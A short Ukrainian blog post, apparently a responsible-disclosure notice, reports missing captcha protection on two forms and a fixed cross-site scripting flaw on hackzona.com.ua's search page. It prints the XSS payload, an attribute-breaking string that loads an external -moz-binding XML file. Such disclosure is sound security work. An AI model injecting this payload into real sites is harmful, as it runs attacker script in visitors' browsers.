Уразливості на hackzona.com.ua
15:20 14.03.201125.10.2010
У березні, 21.03.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на секюріті проекті http://hackzona.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
14.03.2011
Insufficient Anti-automation:
http://hackzona.com.ua/hz.php?name=Feedback
http://hackzona.com.ua/hz.php?name=NLbook
В даних формах немає захисту від автоматизованих запитів (капчі).
XSS:
POST запит на сторінці http://hackzona.com.ua/hz.php?name=Search
" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')
В полі пошуку.
Дані уразливості вже виправлені.
Середа, 18:13 27.10.2010
Дякую, fixed
Середа, 19:30 27.10.2010
Завжди будь ласка.
Як я нещодавно перевірив, дані уразливості якісно виправлені.